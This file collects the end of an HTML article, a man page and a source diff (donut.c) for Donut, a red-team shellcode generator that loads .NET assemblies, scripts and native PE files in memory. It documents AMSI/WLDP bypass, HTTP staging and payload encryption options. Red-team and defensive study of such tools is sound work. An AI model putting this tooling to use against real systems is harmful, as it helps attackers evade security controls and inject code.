904 <pre style='color:#000000;background:#ffffff;'>inst<span style='color:#808030; '>-</span><span style='color:#808030; '>></span>api<span style='color:#808030; '>.</span><span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#008c00; '>1000</span><span style='color:#808030; '>*</span><span style='color:#008c00; '>5</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
905 </pre>
906
907 <p>Future plans for Donut are to provide multiple options for resolving API; Import Address Table (IAT), Export Address Table (EAT) and <a href="https://modexp.wordpress.com/2019/05/19/shellcode-getprocaddress/">Exception Directory</a> to name a few. It should also be much easier to write custom payloads using the loader.</p>
908
909 </body>
910 </html>
0 '\" t
1 .\" Title: donut
2 .\" Author: Odzhan
3 .\" Date: 12/24/2019
4 .\" Manual: Donut Reference Guide
5 .\" Source: Donut
6 .\" Language: English
7 .\"
8 .TH "DONUT" "1" "12/24/2019" "Donut v0.9.3" "Donut Reference Guide"
9 .SH NAME
10 donut \- shellcode generator
11 .SH SYNOPSIS
12 .B donut
13 [options]
14 .IR file ...
15 .SH DESCRIPTION
16 Donut, named after the dotNET framework, generates position-independent code for in-memory execution of VBS/JS/EXE/DLL files on the Microsoft Windows operating system. Both managed .NET assemblies and unmanaged/native EXE, DLL files are supported by the loader. There are dynamic and static libraries available for both Windows and Linux.
17 .SH MODULE OPTIONS
18 .TP
19 .BR \-n " " <name>
20 Module name for HTTP staging. If entropy is enabled, this is generated randomly.
21 .TP
22 .BR \-s " " <server>
23 HTTP server that will host the donut module.
24 .TP
25 .BR \-e " " <level>
26 Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
27 .SH PIC/SHELLCODE OPTIONS
28 .TP
29 .BR \-a " " <arch>
30 Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
31 .TP
32 .BR \-b " " <level>
33 Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
34 .TP
35 .BR \-o " " <path>
36 Output file to save loader. Default is "loader.bin"
37 .TP
38 .BR \-f " " <format>
39 Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal
40 .TP
41 .BR \-y " " <addr>
42 Create a new thread for loader and continue execution at address supplied. \fIaddr\fR Must be in hexadecimal format.
43 .TP
44 .BR \-x " " <action>
45 Exiting. 1=Exit thread (default), 2=Exit process
46 .SH FILE OPTIONS
47 .TP
48 .BR \-c " " <namespace.class>
49 Optional class name. (required for .NET DLL)
50 .TP
51 .BR \-d " " <name>
52 AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
53 .TP
54 .BR \-m " " <method | api>
55 Optional method or function for DLL. (a method is required for .NET DLL)
56 .TP
57 .BR \-p " " <arguments>
58 Optional arguments/command line inside quotations for DLL method/function or EXE.
59 .TP
60 .BR \-w
61 Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
62 .TP
63 .BR \-r " " <version>
64 CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
65 .TP
66 .BR \-t
67 Execute the entrypoint of an unmanaged EXE as a thread.
68 .TP
69 .BR \-z " " <engine>
70 Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman.
71 Compression engines 3, 4 and 5 are only available on Windows.
72 .SH AUTHORS
73 Odzhan, TheWover
74 .SH DISCLAIMER
75 The authors are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.
76 .SH COPYRIGHT
77 BSD 3-Clause License
78
79 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
80
81 Redistribution and use in source and binary forms, with or without
82 modification, are permitted provided that the following conditions are met:
83
84 * Redistributions of source code must retain the above copyright notice, this
85 list of conditions and the following disclaimer.
86
87 * Redistributions in binary form must reproduce the above copyright notice,
88 this list of conditions and the following disclaimer in the documentation
89 and/or other materials provided with the distribution.
90
91 * Neither the name of the copyright holder nor the names of its
92 contributors may be used to endorse or promote products derived from
93 this software without specific prior written permission.
94
95 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
96 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
97 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
98 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
99 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
100 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
101 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
102 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
103 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
104 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
105 .SH "NOTES"
106 .IP " 1." 4
107 Loading .NET Assemblies From Memory.
108 .RS 4
109 \%https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
110 .RE
111 .IP " 2." 4
112 Donut - Injecting .NET Assemblies as Shellcode
113 .RS 4
114 \%https://thewover.github.io/Introducing-Donut/
115 .RE
116 .IP " 3." 4
117 How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
118 .RS 4
119 \%https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/
120 .RE
121 .IP " 4." 4
122 In-Memory Execution of DLL
123 .RS 4
124 \%https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/
125 .RE
126 .IP " 5." 4
127 Data Compression
128 .RS 4
129 \%https://modexp.wordpress.com/2019/12/08/shellcode-compression/
130 .RE
+1276
-694
donut.c less more
3030
3131 #include "donut.h"
3232
33 #include "payload/payload_exe_x86.h"
34 #include "payload/payload_exe_x64.h"
33 #include "loader_exe_x86.h"
34 #include "loader_exe_x64.h"
3535
3636 #define PUT_BYTE(p, v) { *(uint8_t *)(p) = (uint8_t) (v); p = (uint8_t*)p + 1; }
3737 #define PUT_HWORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 2); p = (uint8_t*)p + 2; }
3838 #define PUT_WORD(p, v) { t=v; memcpy((char*)p, (char*)&t, 4); p = (uint8_t*)p + 4; }
3939 #define PUT_BYTES(p, v, n) { memcpy(p, v, n); p = (uint8_t*)p + n; }
4040
41 // these have to be in same order as DONUT_INSTANCE structure in donut.h
42 static API_IMPORT api_imports[]=
43 {
41 // required for each API used by the loader
42 #define DLL_NAMES "ole32;oleaut32;wininet;mscoree;shell32"
43
44 // These must be in the same order as the DONUT_INSTANCE structure defined in donut.h
45 static API_IMPORT api_imports[] = {
4446 {KERNEL32_DLL, "LoadLibraryA"},
4547 {KERNEL32_DLL, "GetProcAddress"},
4648 {KERNEL32_DLL, "GetModuleHandleA"},
5153 {KERNEL32_DLL, "Sleep"},
5254 {KERNEL32_DLL, "MultiByteToWideChar"},
5355 {KERNEL32_DLL, "GetUserDefaultLCID"},
54
56 {KERNEL32_DLL, "WaitForSingleObject"},
57 {KERNEL32_DLL, "CreateThread"},
58 {KERNEL32_DLL, "GetThreadContext"},
59 {KERNEL32_DLL, "GetCurrentThread"},
60
61 {SHELL32_DLL, "CommandLineToArgvW"},
62
5563 {OLEAUT32_DLL, "SafeArrayCreate"},
5664 {OLEAUT32_DLL, "SafeArrayCreateVector"},
5765 {OLEAUT32_DLL, "SafeArrayPutElement"},
7987 {OLE32_DLL, "CoCreateInstance"},
8088 {OLE32_DLL, "CoUninitialize"},
8189
82 { NULL, NULL }
90 {NTDLL_DLL, "RtlEqualUnicodeString"},
91 {NTDLL_DLL, "RtlEqualString"},
92 {NTDLL_DLL, "RtlUnicodeStringToAnsiString"},
93 {NTDLL_DLL, "RtlInitUnicodeString"},
94 {NTDLL_DLL, "RtlExitUserThread"},
95 {NTDLL_DLL, "RtlExitUserProcess"},
96 {NTDLL_DLL, "RtlCreateUnicodeString"},
97 {NTDLL_DLL, "RtlGetCompressionWorkSpaceSize"},
98 {NTDLL_DLL, "RtlDecompressBufferEx"},
99 {NTDLL_DLL, "NtContinue"},
100 //{NTDLL_DLL, "RtlFreeUnicodeString"},
101 //{NTDLL_DLL, "RtlFreeString"},
102
103 { NULL, NULL } // last one always contains two NULL pointers
83104 };
84105
85106 // required to load .NET assemblies
116137
117138 static GUID xIID_IActiveScriptSite = {
118139 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
140
141 static GUID xIID_IActiveScriptSiteWindow = {
142 0xd10f6761, 0x83e9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119143
120144 static GUID xIID_IActiveScriptParse32 = {
121145 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
129153 static GUID xCLSID_JScript = {
130154 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131155
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
156 // where to store information about input file
157 file_info fi;
148158
149159 // return pointer to DOS header
150160 static PIMAGE_DOS_HEADER DosHdr(void *map) {
192202 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193203 }
194204
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
205 static ULONG64 rva2ofs (void *base, ULONG64 rva) {
196206 DWORD i;
197207 ULONG64 ofs;
198208 PIMAGE_DOS_HEADER dos;
201211
202212 dos = (PIMAGE_DOS_HEADER)base;
203213 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
214 sh = (PIMAGE_SECTION_HEADER)
215 ((PBYTE)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);
216
217 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
218 if ((rva >= sh[i].VirtualAddress) &&
219 (rva < (sh[i].VirtualAddress + sh[i].SizeOfRawData))) {
209220
210221 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211222 return ofs;
214225 return -1;
215226 }
216227
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
228 #ifdef WINDOWS
229 #include "mmap-windows.c"
230 #endif
231
232 /**
233 * Function: map_file
234 * ----------------------------
235 * Open and map the contents of file into memory.
236 *
237 * INPUT : path = file to map
238 *
239 * OUTPUT : Donut error code.
240 */
241 static int map_file(const char *path) {
219242 struct stat fs;
220243
221 DPRINT("Reading size of file : %s", path);
244 DPRINT("Entering.");
245
222246 if(stat(path, &fs) != 0) {
247 DPRINT("Unable to read size of file : %s", path);
223248 return DONUT_ERROR_FILE_NOT_FOUND;
224249 }
225250
226251 if(fs.st_size == 0) {
252 DPRINT("File appears to be empty!");
227253 return DONUT_ERROR_FILE_EMPTY;
228254 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
255
256 fi.fd = open(path, O_RDONLY);
257
258 if(fi.fd < 0) {
259 DPRINT("Unable to open %s for reading.", path);
234260 return DONUT_ERROR_FILE_ACCESS;
235261 }
236262
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
263 fi.len = fs.st_size;
264
265 fi.data = mmap(NULL, fi.len, PROT_READ, MAP_PRIVATE, fi.fd, 0);
243266
244267 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
268 if(fi.data == NULL) {
269 DPRINT("Unable to map file : %s", path);
270 close(fi.fd);
248271 return DONUT_ERROR_NO_MEMORY;
249272 }
250273 return DONUT_ERROR_SUCCESS;
251274 }
252275
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
276 /**
277 * Function: unmap_file
278 * ----------------------------
279 * Releases memory allocated for file and closes descriptor.
280 *
281 * INPUT : Nothing
282 *
283 * OUTPUT : Donut error code
284 */
285 static int unmap_file(void) {
286
287 if(fi.zdata != NULL) {
288 DPRINT("Releasing compressed data.");
289 free(fi.zdata);
290 fi.zdata = NULL;
291 }
292 if(fi.data != NULL) {
293 DPRINT("Unmapping input file.");
294 munmap(fi.data, fi.len);
295 fi.data = NULL;
296 }
297 if(fi.fd != 0) {
298 DPRINT("Closing input file.");
299 close(fi.fd);
300 fi.fd = 0;
301 }
302 return DONUT_ERROR_SUCCESS;
303 }
304
305 // only included for executable generator or debug build
306 #if defined(DONUT_EXE) || defined(DEBUG)
307 /**
308 * Function: file_diff
309 * ----------------------------
310 * Calculates the ratio between two lengths for compression and decompression.
311 *
312 * INPUT : new_len = new length
313 * : old_len = old length
314 *
315 * OUTPUT : ratio as a percentage
316 */
317 static uint32_t file_diff(uint32_t new_len, uint32_t old_len) {
318 if (new_len <= UINT_MAX / 100) {
319 new_len *= 100;
320 } else {
321 old_len /= 100;
322 }
323 if (old_len == 0) {
324 old_len = 1;
325 }
326 return (100 - (new_len / old_len));
327 }
328 #endif
329
330 /**
331 * Function: compress_file
332 * ----------------------------
333 * Compresses the input file based on engine selected by user
334 *
335 * INPUT : Pointer to Donut configuration.
336 *
337 * OUTPUT : Donut error code.
338 */
339 int compress_file(PDONUT_CONFIG c) {
340 int err = DONUT_ERROR_SUCCESS;
341
342 // RtlCompressBuffer is only available on Windows
343 #ifdef WINDOWS
344 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
345 USHORT CompressionFormatAndEngine,
346 PULONG CompressBufferWorkSpaceSize,
347 PULONG CompressFragmentWorkSpaceSize);
348
349 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
350 USHORT CompressionFormatAndEngine,
351 PUCHAR UncompressedBuffer,
352 ULONG UncompressedBufferSize,
353 PUCHAR CompressedBuffer,
354 ULONG CompressedBufferSize,
355 ULONG UncompressedChunkSize,
356 PULONG FinalCompressedSize,
357 PVOID WorkSpace);
358
359 ULONG wspace, fspace;
360 NTSTATUS nts;
361 PVOID ws;
362 HMODULE m;
363 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
364 RtlCompressBuffer_t RtlCompressBuffer;
365
366 // compress file using RtlCompressBuffer?
367 if(c->compress == DONUT_COMPRESS_LZNT1 ||
368 c->compress == DONUT_COMPRESS_XPRESS ||
369 c->compress == DONUT_COMPRESS_XPRESS_HUFF)
370 {
371 m = GetModuleHandle("ntdll");
372 RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
373 RtlCompressBuffer = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
374
375 if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
376 DPRINT("Unable to resolve compression API");
377 return DONUT_ERROR_COMPRESSION;
378 }
379
380 DPRINT("Reading fragment and workspace size");
381 nts = RtlGetCompressionWorkSpaceSize(
382 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
383 &wspace, &fspace);
384
385 if(nts == 0) {
386 DPRINT("workspace size : %"PRId32" | fragment size : %"PRId32, wspace, fspace);
387 ws = malloc(wspace);
388 if(ws != NULL) {
389 DPRINT("Allocating memory for compressed data.");
390 fi.zdata = malloc(fi.len);
391 if(fi.zdata != NULL) {
392 DPRINT("Compressing %p to %p with RtlCompressBuffer(%s)",
393 fi.data, fi.zdata,
394 c->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" :
395 c->compress == DONUT_COMPRESS_XPRESS ? "XPRESS" : "XPRESS HUFFMAN");
396
397 nts = RtlCompressBuffer(
398 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
399 fi.data, fi.len, fi.zdata, fi.len, 0,
400 (PULONG)&fi.zlen, ws);
401
402 if(nts != 0) {
403 DPRINT("NTSTATUS : %lx", nts);
404 err = DONUT_ERROR_COMPRESSION;
405 }
406 } else err = DONUT_ERROR_NO_MEMORY;
407 free(ws);
408 } else err = DONUT_ERROR_NO_MEMORY;
409 } else err = DONUT_ERROR_COMPRESSION;
410 }
411 #endif
412 if(c->compress == DONUT_COMPRESS_APLIB) {
413 DPRINT("Obtaining size of compressed data from aP_max_packed_size() and allocating memory");
414 fi.zdata = malloc(aP_max_packed_size(fi.len));
415 if(fi.zdata != NULL) {
416 DPRINT("Obtaining size of work memory from aP_workmem_size() and allocating memory");
417 uint8_t *workmem = malloc(aP_workmem_size(fi.len));
418 if(workmem != NULL) {
419 DPRINT("Compressing with aP_pack()");
420 fi.zlen = aP_pack(fi.data, fi.zdata, fi.len, workmem, NULL, NULL);
421
422 if(fi.zlen == APLIB_ERROR) err = DONUT_ERROR_COMPRESSION;
423 free(workmem);
424 } else err = DONUT_ERROR_NO_MEMORY;
425 } else err = DONUT_ERROR_NO_MEMORY;
426 }
427
428 // if compression is specified
429 if(err == DONUT_ERROR_SUCCESS && c->compress != DONUT_COMPRESS_NONE) {
430 // set the compressed length in configuration
431 c->zlen = fi.zlen;
432 DPRINT("Original file size : %"PRId32 " | Compressed : %"PRId32, fi.len, fi.zlen);
433 DPRINT("File size reduced by %"PRId32"%%", file_diff(fi.zlen, fi.len));
434 }
435 DPRINT("Leaving with error : %" PRId32, err);
436 return err;
437 }
438
439 /**
440 * Function: read_file_info
441 * ----------------------------
442 * Reads information about the input file.
443 *
444 * INPUT : Pointer to Donut configuration.
445 *
446 * OUTPUT : Donut error code.
447 */
448 static int read_file_info(PDONUT_CONFIG c) {
449 PIMAGE_NT_HEADERS nt;
450 PIMAGE_DATA_DIRECTORY dir;
451 PMDSTORAGESIGNATURE pss;
452 PIMAGE_COR20_HEADER cor;
453 DWORD dll, rva, cpu;
454 ULONG64 ofs;
455 PCHAR ext;
456 int err = DONUT_ERROR_SUCCESS;
457
276458 DPRINT("Entering.");
277459
278460 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
461 if(c->input[0] == 0) {
462 DPRINT("No input file provided.");
280463 return DONUT_ERROR_INVALID_PARAMETER;
281464 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
465
466 DPRINT("Checking extension of %s", c->input);
467 ext = strrchr(c->input, '.');
287468
288469 // no extension? exit
289470 if(ext == NULL) {
471 DPRINT("Input file has no extension.");
290472 return DONUT_ERROR_FILE_INVALID;
291473 }
292474 DPRINT("Extension is \"%s\"", ext);
293475
294476 // VBScript?
295477 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
478 DPRINT("File is VBS");
479 fi.type = DONUT_MODULE_VBS;
480 fi.arch = DONUT_ARCH_ANY;
299481 } else
300482 // JScript?
301483 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
484 DPRINT("File is JS");
485 fi.type = DONUT_MODULE_JS;
486 fi.arch = DONUT_ARCH_ANY;
305487 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312488 // EXE?
313489 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
490 DPRINT("File is EXE");
491 fi.type = DONUT_MODULE_EXE;
316492 } else
317493 // DLL?
318494 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
495 DPRINT("File is DLL");
496 fi.type = DONUT_MODULE_DLL;
321497 } else {
322 // unrecognized extension
498 DPRINT("Don't recognize file extension.");
323499 return DONUT_ERROR_FILE_INVALID;
324500 }
325501
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
502 DPRINT("Mapping %s into memory", c->input);
503
504 err = map_file(c->input);
329505 if(err != DONUT_ERROR_SUCCESS) return err;
330506
331507 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
508 if(fi.type == DONUT_MODULE_DLL ||
509 fi.type == DONUT_MODULE_EXE)
334510 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
511 if(!valid_dos_hdr(fi.data)) {
512 DPRINT("EXE/DLL has no valid DOS header.");
338513 err = DONUT_ERROR_FILE_INVALID;
339514 goto cleanup;
340515 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
516
517 if(!valid_nt_hdr(fi.data)) {
518 DPRINT("EXE/DLL has no valid NT header.");
344519 err = DONUT_ERROR_FILE_INVALID;
345520 goto cleanup;
346521 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
522
523 dir = Dirs(fi.data);
350524
351525 if(dir == NULL) {
526 DPRINT("EXE/DLL has no valid image directories.");
352527 err = DONUT_ERROR_FILE_INVALID;
353528 goto cleanup;
354529 }
355530 DPRINT("Checking characteristics");
356531
357 nt = NtHdr(fi->map);
532 nt = NtHdr(fi.data);
358533 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
534 cpu = is32(fi.data);
360535 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361536
362537 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
538 fi.arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364539
365540 // if COM directory present
366541 if(rva != 0) {
367542 DPRINT("COM Directory found");
368543
369544 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
545 fi.type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371546
372547 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
548 strncpy(fi.ver, "v4.0.30319", DONUT_VER_LEN - 1);
374549
375 ofs = rva2ofs(fi->map, rva);
550 ofs = rva2ofs(fi.data, rva);
376551 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
552 cor = (PIMAGE_COR20_HEADER)(ofs + fi.data);
378553 rva = cor->MetaData.VirtualAddress;
379554 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
555 ofs = rva2ofs(fi.data, rva);
381556 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
557 pss = (PMDSTORAGESIGNATURE)(ofs + fi.data);
383558 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
559 strncpy(fi.ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
385560 }
386561 }
387562 }
388 }
389 }
563 } else {
564 // we need relocation information for unmanaged EXE / DLL
565 rva = dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
566 if(rva == 0) {
567 DPRINT("EXE/DLL has no relocation information.");
568 err = DONUT_ERROR_NORELOC;
569 goto cleanup;
570 }
571 }
572 }
573 // assign length of file and type to configuration
574 c->len = fi.len;
575 c->mod_type = fi.type;
390576 cleanup:
391577 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
578 DPRINT("Unmapping input file due to errors.");
579 unmap_file();
580 }
581 DPRINT("Leaving with error : %" PRId32, err);
395582 return err;
396583 }
397584
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
585 /**
586 * Function: gen_random
587 * ----------------------------
588 * Generates pseudo-random bytes.
589 *
590 * INPUT : buf = where to store random bytes.
591 * : len = length of random bytes to generate.
592 *
593 * OUTPUT : 1 if ok, else 0
594 */
595 static int gen_random(void *buf, uint64_t len) {
444596 #if defined(WINDOWS)
445597 HCRYPTPROV prov;
446598 int ok;
448600 // 1. acquire crypto context
449601 if(!CryptAcquireContext(
450602 &prov, NULL, NULL,
451 PROV_RSA_AES,
603 PROV_RSA_FULL,
452604 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453605
454606 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
474626 #endif
475627 }
476628
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
629 /**
630 * Function: gen_random_string
631 * ----------------------------
632 * Generates a pseudo-random string
633 *
634 * INPUT : output = pointer to buffer that receives string
635 * : len = length of string to generate
636 *
637 * OUTPUT : 1 if ok, else 0
638 */
639 static int gen_random_string(void *output, uint64_t len) {
480640 uint8_t rnd[DONUT_MAX_NAME];
481641 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
642 char tbl[]="HMN34P67R9TWCXYF"; // https://stackoverflow.com/a/27459196
483643 char *str = (char*)output;
484644
485645 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486646
487647 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
648 if(!gen_random(rnd, DONUT_MAX_NAME)) return 0;
489649
490650 // generate a string using unambiguous characters
491651 for(i=0; i<len; i++) {
495655 return 1;
496656 }
497657
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
658 /**
659 * Function: build_module
660 * ----------------------------
661 * Create a Donut module from Donut configuration
662 *
663 * INPUT : A pointer to a donut configuration
664 *
665 * OUTPUT : Donut error code.
666 */
667 static int build_module(PDONUT_CONFIG c) {
668 PDONUT_MODULE mod = NULL;
